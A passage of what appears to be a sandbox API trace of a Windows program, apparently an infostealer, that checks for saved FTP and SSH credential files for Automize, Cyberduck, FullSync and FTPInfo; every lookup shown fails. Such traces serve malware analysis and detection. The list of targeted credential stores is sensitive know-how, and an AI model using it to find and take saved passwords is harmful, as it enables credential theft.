wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.724] GetProcessHeap () returned 0x620000 [0063.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.724] GetProcessHeap () returned 0x620000 [0063.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.725] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.726] GetProcessHeap () returned 0x620000 [0063.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.726] GetProcessHeap () returned 0x620000 [0063.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.726] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.727] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0063.727] GetProcessHeap () returned 0x620000 [0063.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638b60 [0063.727] GetProcessHeap () returned 0x620000 [0063.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.728] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0063.728] GetProcessHeap () returned 0x620000 [0063.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.729] GetProcessHeap () returned 0x620000 [0063.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.730] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.731] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0063.731] GetProcessHeap () returned 0x620000 [0063.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.732] GetProcessHeap () returned 0x620000 [0063.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.734] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.734] GetProcessHeap () returned 0x620000 [0063.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.734] GetProcessHeap () returned 0x620000 [0063.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.735] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.736] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0063.736] GetProcessHeap () returned 0x620000 [0063.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63a478 [0063.737] GetProcessHeap () returned 0x620000 [0063.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.738] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.738] GetProcessHeap () returned 0x620000 [0063.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.739] GetProcessHeap () returned 0x620000 [0063.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.739] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.740] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0063.740] GetProcessHeap () returned 0x620000 [0063.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.740] GetProcessHeap () returned 0x620000 [0063.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.742] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0063.742] GetProcessHeap () returned 0x620000 [0063.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.742] GetProcessHeap () returned 0x620000 [0063.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.743] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.744] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0063.744] GetProcessHeap () returned 0x620000 [0063.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.744] GetProcessHeap () returned 0x620000 [0063.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.746] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.746] GetProcessHeap () returned 0x620000 [0063.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.760] GetProcessHeap () returned 0x620000 [0063.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.761] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.762] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0063.762] GetProcessHeap () returned 0x620000 [0063.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.763] GetProcessHeap () returned 0x620000 [0063.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.764] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.766] GetProcessHeap () returned 0x620000 [0063.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.766] GetProcessHeap () returned 0x620000 [0063.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.767] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.768] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0063.768] GetProcessHeap () returned 0x620000 [0063.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.768] GetProcessHeap () returned 0x620000 [0063.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.769] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0063.769] GetProcessHeap () returned 0x620000 [0063.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.770] GetProcessHeap () returned 0x620000 [0063.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.770] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.771] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0063.771] GetProcessHeap () returned 0x620000 [0063.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.771] GetProcessHeap () returned 0x620000 [0063.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.773] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.773] GetProcessHeap () returned 0x620000 [0063.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.774] GetProcessHeap () returned 0x620000 [0063.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.774] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.775] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0063.775] GetProcessHeap () returned 0x620000 [0063.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.775] GetProcessHeap () returned 0x620000 [0063.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.777] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.777] GetProcessHeap () returned 0x620000 [0063.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.778] GetProcessHeap () returned 0x620000 [0063.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.778] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.779] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0063.779] GetProcessHeap () returned 0x620000 [0063.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.779] GetProcessHeap () returned 0x620000 [0063.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.781] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0063.781] GetProcessHeap () returned 0x620000 [0063.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.781] GetProcessHeap () returned 0x620000 [0063.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.782] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.783] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0063.783] GetProcessHeap () returned 0x620000 [0063.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.783] GetProcessHeap () returned 0x620000 [0063.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.784] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.785] GetProcessHeap () returned 0x620000 [0063.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.785] GetProcessHeap () returned 0x620000 [0063.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.786] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.787] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0063.787] GetProcessHeap () returned 0x620000 [0063.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.787] GetProcessHeap () returned 0x620000 [0063.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.788] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.788] GetProcessHeap () returned 0x620000 [0063.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.789] GetProcessHeap () returned 0x620000 [0063.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.790] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.790] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0063.790] GetProcessHeap () returned 0x620000 [0063.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.790] GetProcessHeap () returned 0x620000 [0063.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.792] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0063.792] GetProcessHeap () returned 0x620000 [0063.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.792] GetProcessHeap () returned 0x620000 [0063.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.793] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.795] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0063.795] GetProcessHeap () returned 0x620000 [0063.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.795] GetProcessHeap () returned 0x620000 [0063.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.796] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.796] GetProcessHeap () returned 0x620000 [0063.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.797] GetProcessHeap () returned 0x620000 [0063.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.797] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.798] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0063.798] GetProcessHeap () returned 0x620000 [0063.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.798] GetProcessHeap () returned 0x620000 [0063.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.799] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.799] GetProcessHeap () returned 0x620000 [0063.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.799] GetProcessHeap () returned 0x620000 [0063.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f64) returned 0x63b4a8 [0063.800] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.800] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0063.800] GetProcessHeap () returned 0x620000 [0063.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.800] GetProcessHeap () returned 0x620000 [0063.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.801] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0063.802] GetProcessHeap () returned 0x620000 [0063.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.802] GetProcessHeap () returned 0x620000 [0063.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.802] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.803] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0063.803] GetProcessHeap () returned 0x620000 [0063.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.803] GetProcessHeap () returned 0x620000 [0063.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.804] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0063.804] GetProcessHeap () returned 0x620000 [0063.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.804] GetProcessHeap () returned 0x620000 [0063.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f8e) returned 0x63b4a8 [0063.805] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.806] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0063.806] GetProcessHeap () returned 0x620000 [0063.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x86) returned 0x63a478 [0063.806] GetProcessHeap () returned 0x620000 [0063.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.807] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0063.807] GetProcessHeap () returned 0x620000 [0063.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.807] GetProcessHeap () returned 0x620000 [0063.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.807] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.808] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.808] GetProcessHeap () returned 0x620000 [0063.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f58) returned 0x63b4a8 [0063.809] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.809] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Cyberduck", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0063.809] GetProcessHeap () returned 0x620000 [0063.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x62) returned 0x638b60 [0063.809] GetProcessHeap () returned 0x620000 [0063.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.810] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0063.811] GetProcessHeap () returned 0x620000 [0063.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.811] GetProcessHeap () returned 0x620000 [0063.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.811] GetProcessHeap () returned 0x620000 [0063.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.812] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.812] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.812] GetProcessHeap () returned 0x620000 [0063.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b4a8 [0063.813] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.813] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\iterate_GmbH", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0063.813] GetProcessHeap () returned 0x620000 [0063.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x68) returned 0x638b60 [0063.813] GetProcessHeap () returned 0x620000 [0063.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.814] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0063.815] GetProcessHeap () returned 0x620000 [0063.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.815] GetProcessHeap () returned 0x620000 [0063.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.815] GetProcessHeap () returned 0x620000 [0063.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.816] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.816] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0063.820] GetProcessHeap () returned 0x620000 [0063.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x63b4a8 [0063.820] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.821] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0063.821] GetProcessHeap () returned 0x620000 [0063.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6a) returned 0x638b60 [0063.821] GetProcessHeap () returned 0x620000 [0063.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.822] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0063.822] GetProcessHeap () returned 0x620000 [0063.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.822] GetProcessHeap () returned 0x620000 [0063.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.823] GetProcessHeap () returned 0x620000 [0063.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f72) returned 0x63b4a8 [0063.823] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.824] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0063.824] GetProcessHeap () returned 0x620000 [0063.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7c) returned 0x638b60 [0063.824] GetProcessHeap () returned 0x620000 [0063.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.833] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0063.833] GetProcessHeap () returned 0x620000 [0063.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.834] GetProcessHeap () returned 0x620000 [0063.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f72) returned 0x63b4a8 [0063.834] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.835] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0063.835] GetProcessHeap () returned 0x620000 [0063.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7c) returned 0x638b60 [0063.835] GetProcessHeap () returned 0x620000 [0063.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.836] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0063.836] GetProcessHeap () returned 0x620000 [0063.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.836] GetProcessHeap () returned 0x620000 [0063.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0063.837] GetProcessHeap () returned 0x620000 